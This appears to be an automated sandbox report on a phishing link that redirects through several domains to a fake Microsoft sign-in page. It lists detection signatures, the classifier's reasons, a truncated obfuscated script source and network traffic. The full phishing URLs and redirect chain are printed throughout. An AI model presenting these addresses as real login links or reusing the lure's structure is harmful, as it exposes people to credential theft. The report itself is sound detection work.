Edit tour

Windows Analysis Report
https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

Overview

General Information

Sample URL:	https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com
Analysis ID:	1648503
Infos:

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish54

Creates files inside the system directory

Deletes files inside the Windows folder

Detected hidden input values containing email addresses (often used in phishing pages)

Detected suspicious crossdomain redirect

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML page contains obfuscated script src

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2204,i,2051777256994672153,7090731593673493070,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2272 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.10..script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
2.7.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown' due to its global recognition and presence., The URL 'rutaann.com' does not match the legitimate domain 'microsoft.com'., There is no known association between 'rutaann.com' and Microsoft., The URL does not contain any recognizable elements related to Microsoft, which is suspicious., The presence of input fields like 'Password' and 'Sign in with PIN or smartcard' on a non-Microsoft domain is a common phishing tactic. DOM: 4.8.pages.csv
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'rutaann.com' does not match the legitimate domain 'microsoft.com'., There is no direct association between 'rutaann.com' and Microsoft., The URL does not contain any recognizable elements related to Microsoft., The email input field uses a Microsoft domain, which could be an attempt to phish Microsoft credentials. DOM: 4.9.pages.csv
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'rutaann.com' does not match the legitimate domain for Microsoft., The URL 'rutaann.com' does not contain any recognizable association with Microsoft., The presence of a password input field on a non-legitimate domain is suspicious. DOM: 5.10.pages.csv

Yara detected HtmlPhish54

Source: Yara match	File source: 2.10..script.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0

HTTP Parser: john.smith@microsoft.com

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: Number of links: 0
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: Number of links: 0

Source: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com

HTTP Parser: Base64 decoded: 1742934565.000000

Source: https://rutaann.com/?qrc=john.smith%40microsoft.com	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest	HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: Title: MOD-mgoumsml does not match URL
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: Title: MOD-ec2jorvx does not match URL

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: <input type="password" .../> found
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: <input type="password" .../> found

Source: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com	HTTP Parser: No favicon
Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com	HTTP Parser: No favicon
Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com	HTTP Parser: No favicon
Source: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com	HTTP Parser: No favicon
Source: https://rutaann.com/?qrc=john.smith%40microsoft.com	HTTP Parser: No favicon
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No favicon
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No favicon
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No favicon

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="author".. found
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="author".. found
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="author".. found

Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="copyright".. found
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=estsredirect%3d2%26estsrequest%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="copyright".. found
Source: https://rutaann.com/adfs/ls/?login_hint=john.smith%40microsoft.com&client-request-id=da996b2e-6752-4bd6-ab8f-ad90fc5bae68&username=john.smith%40microsoft.com&wa=wsignin1.0&wtrealm=urn%3Afederation%3AMicrosoftOnline&wctx=estsredirect%3D2%26estsrequest%3DrQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAT0smfeCkq_5r26f-2EP9HrMlYxKhM2Qv8CI-MLRsZJTBJZ-Rl5esW5mSUZDnB1IBW3mAT9i9I9U8KL3VJTUosSSzLz8y6wCLxi4TFgtuLg4BJgkGBQYPjBwriIFeiI1wd_Ln1c9dursf8PO1OfC8MpVn0vU_OAsvLyEPdMS9cA4xRvv2xvF-9EkxD_SiNXlyqXpCgfRw_ziHyLctNQWwsrwwlsQhPYmE6xMXxgY-xgZ5jFznCAk_EAL8MPvtWnVlze8_vWO48NAgwPBBgA0&pullStatus=0	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 142.250.80.100:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.92.117:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.192.251:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.114.43.73:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.179.73.57:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.4:49802 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

HTTP traffic: Redirect from: sso.ninerscorretora.com.br to https://rutaann.com/?dataxx0=eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyj1cmwioijodhrwczovl3j1dgfhbm4uy29tlyisimrvbwfpbii6inj1dgfhbm4uy29tiiwia2v5ijoialldumtvczlrnvowiiwicxjjijoiam9obi5zbwl0aebtawnyb3nvznquy29tiiwiawf0ijoxnzqyotm0ntg1lcjlehaioje3ndi5mzq3mdv9.7w_s5qzwuu25mo-cbj3uwxvuas65kzepzmklv62cljs

Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
